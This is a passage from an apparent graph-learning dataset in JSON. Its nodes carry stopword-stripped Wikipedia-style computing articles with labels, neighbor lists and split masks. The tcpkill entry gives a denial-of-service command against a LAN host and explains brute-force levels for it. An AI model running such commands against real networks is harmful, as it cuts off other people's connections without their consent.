    "text": "General_protection_fault:general protection fault general protection fault gpf x86 instruction set architectures isas fault type interrupt initiated isa-defined protection mechanisms response access violation caused running code either kernel user program mechanism first described intel manuals datasheets intel 80286 cpu introduced 1983 also described section 9.8.13 intel 80386 programmer reference manual 1986 general protection fault implemented interrupt vector number 13 operating systems may also classify exceptions related access violations illegal opcode exceptions general protection faults even though nothing memory protection cpu detects protection violation stops executing code sends gpf interrupt cases operating system removes failing process execution queue signals user continues executing processes however operating system fails catch general protection fault i.e another protection violation occurs operating system returns previous gpf interrupt cpu signals double fault stopping operating system yet another failure triple fault occurs cpu unable recover since 80286 cpu enters special halt state called shutdown exited hardware reset ibm pc first pc-compatible system contain 80286 hardware detects shutdown state automatically resets cpu occurs descendants pc pc triple fault causes immediate system reset microsoft windows general protection fault presents varied language depending product version unix linux errors reported separately e.g segmentation fault memory errors memory errors faulting program accesses memory access examples include however many modern operating systems implement memory access-control schemes via paging instead segmentation often case invalid memory references operating systems windows reported via page faults instead general protection faults operating systems typically provide abstraction layer exception handling signals hides whatever internal processor mechanism used raise memory access error program purposes providing standard interface handling many different types processor-generated error conditions terms x86 architecture general protection faults specific segmentation-based protection comes memory accesses however general protection faults still used report protection violations aside memory access violations paging used use instructions accessible current privilege level cpl theoretically possible operating system utilize paging segmentation part common operating systems typically rely paging bulk memory access control needs things computer reserved exclusive use operating system program part operating system attempts use one features may cause general protection fault additionally storage locations reserved operating system processor consequence reservation read-only attempt write data unprivileged program error general protection faults raised processor protected instruction encountered exceeds permission level currently executing task either user-mode program attempting protected instruction operating system issued request would put processor undefined state general protection faults caught handled modern operating systems generally fault originated user-mode program user-mode program terminated however fault originated core system driver operating system operating system usually saves diagnostic information either file screen stops operating either restarts computer displays error screen blue screen death kernel panic segment limits exceeded segment permissions violated occur faults occur task state segment tss structure causes general protection faults",
    "neighbors": [
      2560,
      6155,
      6675,
      7187,
      10776,
      25,
      4637,
      3615,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      2627,
      6730,
      6221,
      3160,
      10333,
      6751,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      8301,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      7804,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      8852,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      6829,
      8879,
      3248,
      178,
      3250,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      6868,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      5358,
      242,
      5363,
      9466,
      2811,
      9468,
      1278,
      255,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      9547,
      5452,
      6988,
      5457,
      11601,
      7507,
      7508,
      7511,
      10590,
      3426,
      8551,
      5484,
      7020,
      11635,
      372,
      2933,
      5492,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      1954,
      421,
      1445,
      935,
      3496,
      4521,
      2987,
      9643,
      4525,
      11184,
      7601,
      10676,
      6075,
      8126,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      4074,
      10730,
      10731,
      8687,
      6128,
      6129,
      5105,
      499,
      5619,
      5115
    ],
    "mask": "None"
  },
  {
    "node_id": 6079,
    "label": 8,
    "text": "Web_Services_Conversation_Language:web services conversation language web service conversation language wscl proposal defines overall input output message sequences one web service using finite state automaton fsa alphabet message types",
    "neighbors": [
      10020,
      2501,
      7878,
      8626,
      119,
      7198
    ],
    "mask": "Test"
  },
  {
    "node_id": 6080,
    "label": 4,
    "text": "Prolexic_Technologies:prolexic technologies prolexic technologies u.s.-based provider security solutions protecting web sites data centers enterprise ip applications distributed denial service ddos attacks network transport application layers february 2014 akamai technologies acquired prolexic technologies operated ddos mitigation platform global network traffic scrubbing centers real-time monitoring mitigation services provided 24/7 security operations control center socc prolexic indicated ddos mitigation services make websites data centers enterprise ip applications harder take via ddos attacks 2003 prolexic technologies founded barrett lyon subject book fatal system error joseph menn prolexic protects organizations following markets airlines/hospitality e-commerce energy financial services gambling gaming public sector software service sony said customer company prolexic claims largest banks clients 2005 company named one 100 hottest private companies north america red herring 2011 prolexic indicated secured payment card industry data security standard pci dss level 2 compliance certification pci security standards council would speed deployment remediation compliant organizations encrypted application layer 7 ddos attacks 2011 prolexic ceo scott hammack president stuart scholly joined company prolexic acquired internet content delivery network akamai technologies 370 million deal completed february 2014 2011 prolexic completed two financing rounds led kennet partners totaling 15.9 million 2012 company reported 2011 achieved profitability compound annual growth rate 45 2012 baltimore private equity firm camden partners invested 6 million company american trading production corp invested 2 million part 8 million series b funding round deal jason tagler camden partners joined board directors prolexic prolexic said would use series b money support staff augment network 2013 prolexic closed us 30 million series c funding round led new investors trident capital intel capital kennet partners camden partners medina capital took part funding round company claims partners bt global services datacraft grove internap ip converge level 3 communications preventia telstra prolexic provides three kinds ddos protection services clients monitoring attack detection services mitigation services intercept attacks attack intelligence post-attack intelligence services addition prolexic aggregates intelligence information reports active botnets fraud-linked ip addresses company opened first network traffic scrubbing center north america 2003 europe 2005 asia 2007 2012 company ’ traffic scrubbing capability excess 500 gbit/s bandwidth comprised multiple carriers distributed global network firm said investing infrastructure cope 1.2tbit/s peak traffic loads end 2013 many ddos attacks concerted efforts sophisticated live attackers prolexic uses combination automated tools human expertise part services 2012 company said successfully stopped ddos attacks affecting clients date including attacks application servers layer 4 syn floods layer 7 attacks well http get flood attacks zero-day attacks udp/icmp floods tcp flag abuses dns reflection dns attacks prolexic said mitigated largest ddos attack 2011 involved 250,000 computers infected malware company ’ service typically mitigates attacks within 5 20 minutes client network traffic starts flowing scrubbing center prolexic mitigated 30,000 ddos attacks 2003–2011 2011 prolexic mitigated 10 80 attacks daily 2012 hacktivism vandalism cited main inspiration ddos attacks rather extortion past type motivation said make company victim high-profile organizations organizations sizes said risk ddos attacks newer application-level attacks targeted classic ddos botnet attacks ’ need many resources deploy cloud-based ddos mitigation approach used prolexic employs technology redirect traffic company ’ ddos mitigation service scrub traffic send legitimate traffic client site attack mitigation approach said lower-cost traditional approach company maintaining network firewall making ddos attack prevention option firms business web",
    "neighbors": [
      8998,
      2409,
      8170,
      6347,
      9181,
      7515,
      4883,
      467,
      10106,
      2299,
      7037,
      7102
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6081,
    "label": 4,
    "text": "Sendio:sendio sendio newport beach california-based e-mail security company privately held company founded 2004 tal golan currently serves company president cto using sender address verification technology sendio provides e-mail security solution stops spam viruses malware phishing attacks unsolicited e-mail reaching e-mail inbox february 2007 sendio received 4 million venture capital funding vicente capital shepherd ventures athenian venture partners former microsoft cio rick devenuti appointed board directors sendio 2007 sendio customers include central dupage hospital arnerich massena inc. leading hotels world penn state sentinel real estate corporation sendio e-mail security platform formerly named i.c.e box appliance solution eliminates spam viruses e-mail security platform esp uses verification model first-time unsolicited senders scans viruses phishing directions outbound message recipients added user personal accept contact list authenticated subsequent messages sender assured reaching recipient inbox esp combines silverlisting technology includes set low-level smtp tests determine legitimacy sending e-mail server sender address verification verifies authenticity first-time unsolicited senders introduces human element process combination silverlisting sav prevents 100 spam esp employs verification model similar one embraced millions social networking users facebook linkedin “ buddy ” list model used leading instant messaging providers skype yahoo google aol sendio i.c.e box named best best product year 2006 government computer news email integrity award winner 2007 tomorrow technology today sendio named emerging vendor crn magazine security technology sector june 2008",
    "neighbors": [
      488,
      7515,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 6082,
    "label": 2,
    "text": "PC/TCP_Packet_Driver:pc/tcp packet driver pc/tcp packet driver networking api ms-dos pc dos later x86 dos implementations dr-dos freedos etc implements lowest levels tcp/ip stack remainder typically implemented either tsr drivers library linked application program invented 1983 mit lab computer science csr/csc group jerry saltzer david d. clark commercialized 1986 ftp software packet driver uses x86 interrupt number int number used detected runtime commonly 60h may changed avoid application programs use fixed interrupts internal communications interrupt vector used pointer 4-bytes little endian address possible interrupt handler text string pkt drvr found within first 12-bytes immediately following entry point driver located packet drivers implement many different network interfaces including ethernet token ring rs-232 arcnet x.25 winpkt driver enables use packet drivers microsoft windows moves around applications willy nilly w3c507 dll packet driver microsoft windows environment support ethernet alike network interface using 8250 uart cslip ipx token ring localtalk arcnet",
    "neighbors": [
      292,
      1030,
      9992,
      7501,
      9166,
      1648,
      178,
      499,
      7706,
      10079
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6083,
    "label": 8,
    "text": "Tcpkill:tcpkill tcpkill network utility program used kill connections particular host network port combination programs take standard berkeley packet filter bpf filters used port mirroring arp spoofing prevent connections host www.google.com use command computer attempting go site blocked site surf site good idea either redirect output nothingness 2 /dev/null 1 /dev/null file later analysis file.tcpkill default redirect output console hosts specified command block well−known ports e.g. napster port 8888 port 6699 gnutella port 6346 command tcpkill used create dos attack within wan lan done using sniffer like dsniff tcpdump look packets transmitted pick target want deny service assume target identified 192.168.100.38 simple command like tcpkill -9 host 192.168.100.38 kill outgoing tcp packets tcp segment target rest network prior attack target receive packets rest network -i -i option specify interface want program listen default option interface computers eth0 computers one interface -1 ... 9 -1 -9 specify degree brute force want attack use target -1 least brute -9 brute computers network fast connection usually require brute force order successfully perform dos attack otherwise command run without -1 -9 option -i option description one various dsniff programs text belongs dsniff “ readme ” written author dug song see also filesnarf macof mailsnarf msfsnarf sshmitm tcpnice urlsnarf webmitm webspy",
    "neighbors": [
      2292,
      7895
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6084,
    "label": 3,
    "text": "IBM_ROMP:ibm romp romp reduced instruction set computer risc microprocessor designed ibm late 1970s also known research opd microprocessor two ibm divisions collaborated inception ibm research office products division opd 032 romp originally developed office equipment small computers intended follow-on mid-1970s ibm opd mini processor microprocessor used ibm office system/6 word-processing system first examples became available 1981 first used commercially ibm rt pc announced january 1986 time rt pc planned personal computer romp replacing intel 8088 found ibm personal computer however rt pc later re-positioned engineering scientific workstation computer later cmos version romp first used coprocessor board ibm 6152 academic system introduced 1988 later appeared models rt pc architectural work romp started late spring 1977 spin-off ibm research 801 risc processor hence research acronym architectural changes cost reduction adding 16-bit instructions byte-efficiency original romp 24-bit architecture instruction set changed 32 bits years development first chips ready early 1981 making romp first industrial risc processor revealed international solid-state circuits conference 1984 romp first appeared commercial product processor ibm rt pc workstation introduced 1986 provide examples rt pc production volume production romp mmu began 1985 delay completion romp design introduction rt pc caused overly ambitious software plans rt pc operating system os os virtualized hardware could host multiple operating systems technology called virtualization commonplace mainframe systems began gain traction smaller systems 21st century improved cmos version romp first used ibm 6152 academic system workstation later models rt pc ibm research used romp research parallel processor prototype rp3 early experimental scalable shared-memory multiprocessor supported 512 processors first detailed 1985 cmos version ace experimental numa multiprocessor operational 1988 romp architecture based original version ibm research 801 minicomputer main differences larger word size 32 bits instead 24 inclusion virtual memory architecture supported 8- 16- 32-bit integers 32-bit addressing 40-bit virtual address space instruction pointer register sixteen 32-bit general-purpose registers microprocessor controlled 118 simple 16- 32-bit instructions romp virtual memory segmented 40-bit 1tb address space consisting 4,096 256mb segments 40-bit virtual address formed mmu concatenating 12-bit segment identifier 28 low-order bits 32-bit romp-computed virtual address segment identifier obtained set 16 segment identifiers stored mmu addressed four high-order bits 32-bit romp-computed virtual address romp scalar processor three-stage pipeline first stage instructions 16-byte instruction prefetch buffer instruction fetched decoded operands general-purpose register file read instruction prefetch buffer read 32-bit word memory whenever romp accessing instructions executed second stage written back general-purpose register file third stage romp used bypass network appropriate scheduled register file reads writes support back-to-back execution dependent instructions register-to-register instructions executed single cycle 118 instructions 84 single-cycle latency romp ibm-developed companion integrated circuit code-named rosetta development rosetta memory management unit mmu provided romp address translation facilities translation lookaside buffer store buffer romp rosetta originally implemented ibm 2μm silicon-gate nmos technology two levels metal interconnect romp consists 45,000 transistors 7.65×7.65mm large 58.52mm rosetta consists 61,500 transistors 9.02×9.02mm large 81.36mm packaged 135-pin ceramic pin grid arrays cmos version romp rosetta called romp-c rosetta-c later developed",
    "neighbors": [
      8450,
      6415,
      1298,
      11539,
      9371,
      8861,
      3493,
      6311,
      682,
      10796,
      4269,
      3630,
      7983,
      2224,
      4144,
      9391,
      1462,
      9911,
      7234,
      3014,
      3142,
      4424,
      6087,
      9932,
      3323,
      6607,
      2517,
      7911,
      10985,
      9964,
      5358,
      8048,
      8944,
      757,
      2039,
      249,
      3451,
      8700,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 6085,
    "label": 1,
    "text": "Flat-file_database:flat-file database flat-file database database stored file called flat file records follow uniform format structures indexing recognizing relationships records file simple flat file plain text file binary file relationships inferred data database database format make relationships explicit term generally implied small database large databases also flat plain text files usually contain one record per line different conventions depicting data comma-separated values delimiter-separated values files fields separated delimiters comma tab characters cases field may fixed length short values may padded space characters extra formatting may needed avoid delimiter collision using delimiters incurs overhead locating every time processed unlike fixed-width formatting may performance implications however use character delimiters especially commas also crude form data compression may assist overall performance reducing data volumes — especially data transmission purposes use character delimiters include length component declarative notation comparatively rare vastly reduces overhead associated locating extent field examples flat files include codice_1 codice_2 unix-like operating systems another example flat file name-and-address list fields name address phone number list names addresses phone numbers written hand sheet paper flat-file database also done typewriter word processor spreadsheet text editor program may used implement flat-file database may printed used online improved search capabilities herman hollerith work us census bureau first exercised 1890 united states census involving data tabulated via hole punches paper cards may considered first computerized flat-file database presumably included cards indexing cards otherwise relating individual records i.e individual cards one another save group membership 1980s configurable flat-file database computer applications popular ibm pc macintosh programs designed make easy individuals design use databases almost par word processors spreadsheets popularity examples flat-file database software include early versions filemaker shareware pc-file popular dbase flat-file databases common ubiquitous easy write edit suit myriad purposes uncomplicated way linear stores nosql data json formatted data primitive spreadsheets perhaps comma-separated tab-delimited text files seen flat-file databases lack integrated indexes built-in references data elements complex data types programs manage collections books appointments address book may use essentially single-purpose flat-file databases storing retrieving information flat files unadorned indexes pointing systems user write table contents text file text file format include concept table contents user may write friends kathy notes section john contact information interpreted user rather built-in feature database database system begins recognize codify relationships records begins drift away flat detailed system describing types hierarchical relationships structured considered flat following example illustrates typical elements flat-file database data arrangement consists series columns rows organized tabular format specific example uses one table columns include name person name second column team name athletic team supported person third column numeric unique id used uniquely identify records first column example textual representation described data type data representation quite standard flat-file database although additional considerations readily apparent text",
    "neighbors": [
      2688,
      5632,
      4486,
      4614,
      8201,
      5397,
      9631,
      1697,
      9762,
      10145,
      9397,
      9147,
      7868,
      4155,
      11324,
      11457,
      9286,
      2512,
      2901,
      7767,
      11098,
      4065,
      7650,
      8291,
      9828,
      10471,
      1146,
      6395,
      3196
    ],
    "mask": "Test"
  },
  {
    "node_id": 6086,
    "label": 4,
    "text": "Cliqz:cliqz cliqz privacy oriented web browser developed cliqz gmbh majority-owned hubert burda media available desktop mobile web browser well extension firefox fork firefox web browser privacy-oriented changes among crowdsourced anti-tracking mechanism in-house search engine embedded within browser utilizing index web pages produce suggestions within address bar dropdown menu rather separate pages browser developers argued privacy-focused search engines may still pass user ip address third-party search providers august 2016 mozilla developer firefox made minority investment cliqz cliqz plans eventually monetize software program known cliqz offers deliver sponsored offers users based interests browsing history however recommendations processed locally based remote repository offers personally identifiable data sent remote servers 15 february 2017 cliqz international gmbh wholly owned subsidiary cliqz gmbh acquired privacy-oriented browser extension ghostery 6 october 2017 mozilla announced test approximately 1 users downloading firefox germany would receive version cliqz software included feature providedrecommendations directly browser search field including news weather sports websites based user browsing history activities press release noted users receive version firefox cliqz browsing activity sent cliqz servers including urls pages visit cliqz uses several techniques attempt remove sensitive information browsing data sent firefox according firefox support website version firefox collects sends data cliqz corporation including text typed address bar queries search engines information visited webpages interactions including mouse movement scrolling amount time spent user interactions user interface cliqz software data tied unique identifier allowing cliqz track long-term performance interaction data collected sent mozilla corporation includes among things counts visits search engine pages search engines used cliqz identifier data collection enabled default users must actively opt-out wish data transmitted",
    "neighbors": [
      1664,
      6528,
      6657,
      3971,
      3462,
      7943,
      8584,
      6797,
      2579,
      7572,
      7965,
      10910,
      8351,
      5026,
      1834,
      9770,
      7340,
      559,
      7983,
      9908,
      4661,
      3639,
      823,
      11449,
      4797,
      64,
      10057,
      11466,
      5707,
      7885,
      4048,
      7889,
      10834,
      4310,
      5078,
      6231,
      6747,
      8923,
      737,
      5605,
      4326,
      487,
      8169,
      1642,
      9834,
      8557,
      494,
      1520,
      7152,
      115,
      9843,
      4728,
      5114,
      8443,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6087,
    "label": 2,
    "text": "Virtual_address_space:virtual address space computing virtual address space vas address space set ranges virtual addresses operating system makes available process range virtual addresses usually starts low address extend highest address allowed computer instruction set architecture supported operating system pointer size implementation 4 bytes 32-bit 8 bytes 64-bit os versions provides several benefits one security process isolation assuming process given separate address space new application 32-bit os executed process vas one memory addresses 0 2 − 1 space single byte value initially none values '- represents value using setting values vas would cause memory exception application executable file mapped vas addresses process vas mapped bytes exe file os manages mapping v values bytes mapped file required dll files mapped includes custom libraries well system ones kernel32.dll user32.dll process starts executing bytes exe file however way process use set '- values vas ask os map bytes file common way use vas memory way map page file page file single file multiple distinct sets contiguous bytes mapped vas different parts page file map vas different processes microsoft windows 32-bit default made available processes use used operating system later 32-bit editions microsoft windows possible extend user-mode virtual address space left kernel-mode virtual address space marking programs image_file_large_address_aware enabling /3gb switch boot.ini file microsoft windows 64-bit process running executable linked /largeaddressaware operating system artificially limits user mode portion process virtual address space 2 gib applies 32- 64-bit executables processes running executables linked /largeaddressaware yes option default 64-bit visual studio 2010 later access virtual address space 32-bit executables 64-bit executables windows windows 8 64-bit executables windows 8.1 later allocating memory via c malloc establishes page file backing store new virtual address space however process also explicitly map file bytes x86 cpus linux 32-bit allows splitting user kernel address ranges different ways 3g/1g user/kernel default 1g/3g user/kernel 2g/2g user/kernel",
    "neighbors": [
      4101,
      9466,
      3725,
      6797,
      7053,
      8080,
      8976,
      11539,
      5783,
      7833,
      11674,
      3615,
      10145,
      5796,
      6829,
      7471,
      7728,
      6705,
      2045,
      7983,
      11574,
      823,
      7607,
      8251,
      2627,
      6084,
      4424,
      7762,
      7421,
      5598,
      6239,
      9829,
      8551,
      4075,
      499,
      3702,
      8186,
      2556,
      5885,
      1791
    ],
    "mask": "Test"
  },
  {
    "node_id": 6088,
    "label": 2,
    "text": "Windows_Speech_Recognition:windows speech recognition windows speech recognition wsr speech recognition component developed microsoft windows vista operating system enables use voice commands control desktop user interface dictate text electronic documents email navigate websites perform keyboard shortcuts operate mouse cursor also supports creation custom macros perform additional tasks wsr locally-processed speech recognition platform rely cloud computing accuracy dictation recognition adapts based user context grammar input speech samples training sessions vocabulary dictation provides personal dictionary allows users include exclude words expressions optionally record pronunciations increase recognition accuracy windows search wsr also optionally analyze collect text documents email handwritten input tablet pc contextualize disambiguate terms adapt personalize recognizer custom language models adapt recognizer specific context phonetics terminology users particular occupational fields legal medical also supported wsr developed integrated component windows vista windows previously supported speech recognition limited individual applications windows media player microsoft office xp introduced speech recognition support limited internet explorer office windows vista majority integrated applications controlled speech office 2007 later versions office rely wsr replacing separate office speech recognition present windows 7 windows 8 windows 8.1 windows rt windows 10 microsoft involved speech recognition speech synthesis research many years 1993 microsoft hired xuedong huang carnegie mellon university lead speech development efforts company research eventually led development speech api introduced 1994 speech recognition also used microsoft products prior wsr versions microsoft office including office xp office 2003 provided speech recognition capabilities among internet explorer office applications installation office also enabled limited speech functionality windows 98 windows windows nt 4.0 windows 2000 2002 tablet pc edition windows xp included speech recognition tablet pc input panel microsoft plus windows xp expansion package enabled voice commands used windows media player however support limited individual applications windows vista windows include integrated speech recognition capabilities 2002 windows hardware engineering conference winhec 2002 microsoft announced windows vista known codename longhorn would include advances speech recognition features microphone array support features part company goal provide consistent quality audio infrastructure natural continuous speech recognition discrete command control bill gates stated 2003 professional developers conference pdc 2003 microsoft would build speech capabilities system -- big advance 'longhorn recognition synthesis real-time pre-release builds throughout development windows vista included speech engine training features pdc 2003 developer presentation dedicated user input stated windows vista would also include user interface microphone feedback control well separate user configuration training features microsoft later clarified extent speech recognition would integrated stated pre-release software development kit common speech scenarios like speech-enabling menus buttons enabled system-wide winhec 2004 microsoft listed wsr part longhorn mobile pc strategy improve productivity winhec 2005 microsoft emphasized accessibility new mobility scenarios improvements speech user experience unlike speech support included windows xp integrated tablet pc input panel required switching separate commanding dictation modes windows vista would introduce dedicated interface speech input desktop unify separate speech modes users could previously speak command dictating vice versa without first switching two modes microsoft also stated windows vista would improve dictation accuracy support additional languages microphone arrays demonstration winhec 2005 focused email dictation correction editing commands presentation microphone arrays also shown windows vista beta 1 later included integrated speech recognition application incentivize company employees analyze wsr software glitches provide feedback development microsoft offered opportunity testers win premium model xbox 360 video game console july 27 2006 operating system release manufacturing rtm notable incident involving wsr occurred demonstration microsoft resulted unintended output dear aunt let set double killer delete select several attempts dictate led consecutive output errors incident subject significant derision among analysts journalists audience microsoft later revealed issues due audio gain glitch caused speech recognizer distort dictated words glitch fixed windows vista release early 2007 reports surfaced wsr might vulnerable attack could allow attackers play audio computer speakers thereby using capabilities perform undesired user operations target computer first vulnerability discovered windows vista general availability microsoft stated attack theoretically possible would meet number prerequisites successful target system would speech recognition feature properly configured activated speakers microphone connected targeted system would need turned exploit would require software interpret commands without user noticing—an unlikely scenario affected system would perform visible interface operations produce audible feedback mitigating factors include dictation clarity microphone feedback placement user account control exploit nature also would able perform privileged operations users protected administrators without explicit consent windows 7 microsoft introduced several changes improve user experience recognizer updated use microsoft ui automation—substantially enhancing performance—and recognition engine uses wasapi audio stack enables support echo cancellation document harvester optionally analyzes collects text email documents contextualize disambiguate user terms improved performance updated run periodically background instead recognizer startup sleep mode also seen performance improvements address security issues windows 7 introduces new voice activation option—enabled default—that turns recognizer users speak stop listening instead putting recognizer sleep windows 7 also introduces option submit speech training data microsoft improve future recognizer versions windows 7 introduced optional dictation scratchpad interface functions temporary document users dictate type text insertion applications compatible text services framework wsr previously provided enable dictation everywhere option windows vista wsr used control metro user interface windows 8 windows 8.1 windows rt commands open charms bar press windows c display commands metro-style apps press windows z perform tasks e.g. change celsius msn weather display installed apps listed start screen apps wsr featured settings application starting windows 10 april 2018 update version 1803 change first appeared insider preview build 17083 april 2018 update also introduces new ++ keyboard shortcut activate wsr wsr allows user control computer including operating system desktop user interface voice commands applications including bundled windows also controlled voice commands using speech recognition users dictate text within documents email forms control operating system user interface perform keyboard shortcuts move mouse cursor wsr uses local speech profile store information user voice accuracy speech recognition increases use helps feature adapt user grammar speech patterns vocabulary word usage speech recognition also includes tutorial improve accuracy optionally review user personal documents—including email—to improve command dictation accuracy individual speech profiles created per-user basis backups profiles performed via windows easy transfer wsr supports following languages chinese traditional chinese simplified english u.s. english u.k. french german japanese spanish wsr relies speech api developed microsoft third-party applications must support text services framework wsr interface consists status area displays instructions information commands e.g. command heard recognizer status recognizer voice meter displays visual feedback volume levels status area represents current state wsr total three modes listed respective meanings colors recognizer listening mode button denote various modes operation blue listening blue-gray sleeping gray turned yellow user switches context e.g. desktop taskbar voice command misinterpreted status area also display custom user information part windows speech recognition macros alternates panel disambiguation interface displays list items interpreted relevant user spoken word word phrase user desired insert application listed among results user speak corresponding number word phrase results confirm choice speaking ok insert within application alternates panel also appear launching applications speaking commands refer one item e.g. speaking start internet explorer may list web browser version browser add-ons disabled however exactmatchoverpartialmatch windows registry entry limit commands items exact names one instance included results listed common wsr commands words italics indicate word substituted desired item e.g. word direction scroll direction command substituted word start typing command enables wsr interpret dictation commands keyboard shortcuts mousegrid command enables users control mouse cursor overlaying numbers across nine regions screen regions gradually narrow user speaks number region focus desired interface element reached regions user interact based commands including click number region moves mouse cursor desired region clicks mark number region allows item computer icon region selected clicked previous click command user also simultaneously interact multiple regions mousegrid applications interface elements present identifiable commands still controlled asking system overlay numbers top show numbers command active speaking overlaid number selects item user open perform operations show numbers designed users could interact items readily identifiable wsr enables dictation text operating system applications dictation mistake occurs corrected speaking correct word correct alternates panel appear provide suggestions correction suggestions selected speaking number corresponding number suggestion list speaking ok. desired item listed among suggestions user speak might appear alternatively users speak spell 'll spell speak desired item per-letter basis users use personal alphabet nato phonetic alphabet spelling multiple words sentence corrected simultaneously example user speaks dictating recognizer interprets word thing user state correct thing correct words english language 100,000 words recognized default wsr includes personal dictionary allows users include exclude certain words expressions dictation user adds word beginning capital letter dictionary user specify whether always capitalized capitalization depends context word spoken users also record pronunciations words added dictionary increase recognition accuracy words written via stylus tablet pc windows handwriting recognition feature also stored information stored within dictionary included part user speech profile wsr supports custom macros supplementary application microsoft enables additional natural language commands example functionality email macro released microsoft enables natural language command user state send email contact subject opens microsoft outlook compose new message designated contact subject automatically inserted microsoft also released sample macros speech dictionary windows media player microsoft powerpoint speech synthesis switch multiple microphones customize various aspects audio device configuration volume levels general natural language queries weather forecast time date answers queries spoken via speech synthesizer users developers create macros based text transcription substitution application execution support command-line arguments keyboard shortcuts emulation existing voice commands combination items xml jscript vbscript supported macros limited individual applications desired rules macros defined programmatically macro load must stored speech macros folder within current user documents directory macros digitally signed default user certificate available ensure commands corrupted loaded third-parties one available administrator create certificate use macros utility also includes security levels prohibit unsigned macros loaded prompt users sign macros load unsigned macros wsr uses microsoft speech recognizer 8.0 changed since windows vista dictation found 93.6 accurate without training mark hachman senior editor pc world —a rate accurate competing software according microsoft rate accuracy trained 99 hachman commented microsoft publicly discuss wsr attributing 2006 incident development windows vista users knowing documents could dictated within windows introduction cortana",
    "neighbors": [
      11270,
      5643,
      4624,
      9744,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      1581,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      4194,
      7780,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      8315,
      10879,
      8841,
      6797,
      2193,
      9874,
      10388,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      3250,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      214,
      2782,
      9442,
      740,
      4836,
      4326,
      2279,
      9448,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      10557,
      6462,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3533,
      3535,
      8659,
      1498,
      5594,
      478,
      9694,
      6114,
      6115,
      488,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 6089,
    "label": 4,
    "text": "Relocatable_user_backup:relocatable user backup relocatable user backup rub ability restore relocate backups another system site one primary ways mitigate threat service-provider lock-in software service model also provides backup event service-provider suffers catastrophic failure concept requires 3 fundamental components third component also contains implication either application provided backup consistent ongoing application upgrade path prevent situation restore rub prevented due obsolete version application software",
    "neighbors": [
      467,
      3366
    ],
    "mask": "Test"
  },
  {
    "node_id": 6090,
    "label": 3,
    "text": "Poqet_PC:poqet pc poqet pc small portable ibm pc compatible computer introduced 1989 poqet computer corporation price 2000 computer discontinued fujitsu ltd. bought poqet computer corp first subnotebook form factor ibm pc compatible computer ran ms-dos poqet pc powered two aa-size batteries use aggressive power management includes stopping cpu keystrokes batteries able power computer anywhere couple weeks couple months depending usage computer also uses instant feature powering used immediately without go full booting sequence poqet pc comparable hp 95lx/hp 100lx/hp 200lx atari portfolio handheld computers three variants produced poqet pc first introduced poqet pc prime followed shortly original version subsequently renamed poqet pc classic several years later poqet pc plus introduced main difference poqet pc classic prime expansion ram 512 640 kb enhancement power management features several years poqet prime classic time fujitsu purchased poqet computer corp. new improved poqet pc plus introduced poqet pc plus significant differences classic prime models better others features rechargeable battery pack holds smaller charge classic enhanced pc card slots support pc cards transflective backlit lcd 2 mb ram 640 kb dos 64 kb shadow 1-1344 kb ram disk poqet classic lcd n't backlight prone breaking poqet pc plus also took type release 1.0 sram cards opposed type ii cards release 2.0 cards including flash sram modem cards plus also memory despite many improvements plus also drawbacks poqet pc plus considerably larger heavier predecessors weighed approximately opposed classic also odd miniature 26-pin serial connector currently available adapter however many toshiba external floppy drives dongles used jae connector amateur radio hobbyist uses poqet found way make suitable adapter also totally pcmcia release 2.0 compatible memory cards work bryan mason says poqet site pnb samantha modem megahertz 14.4 kbit/s modem xjack paradyne keepintouch 14.4 kbit/s modems work addition compactflash cards work poqet users found many machines work newer cf cards poqet pc one first subnotebooks exist marketplace still today one smallest although beaten hp 200lx immediately recognized milestone portable computing pc magazine awarded poqet pc development team ian h. s. cullimore john p. fairbanks leroy d. harper shinpei ichikawa stavro evangelo prodromou coveted technical excellence award 1989 device pc world called one 50 greatest gadgets last 50 years short lifespan 1989-1994 poqet bought fujitsu poqet soon axed short time poqet value declined onset windows ce similar decline hp 200lx demand also occurred introduction hp windows ce machines however despite new machines power operating system soon proved inefficient poqets hp 'lx dos machines became high demand recently hp 200lx sold 182 ebay poqets also fairly high demand fetch somewhat lower prices cherry hill nj business disks n data stock classics pluses owner store jerry tessler put sold twenty minutes unlike running windows ce running dos near-standard specifications meant everything lotus 1-2-3 zork worked expected",
    "neighbors": [
      577,
      321,
      2179,
      6090,
      7243,
      8301,
      9166,
      1776,
      3281,
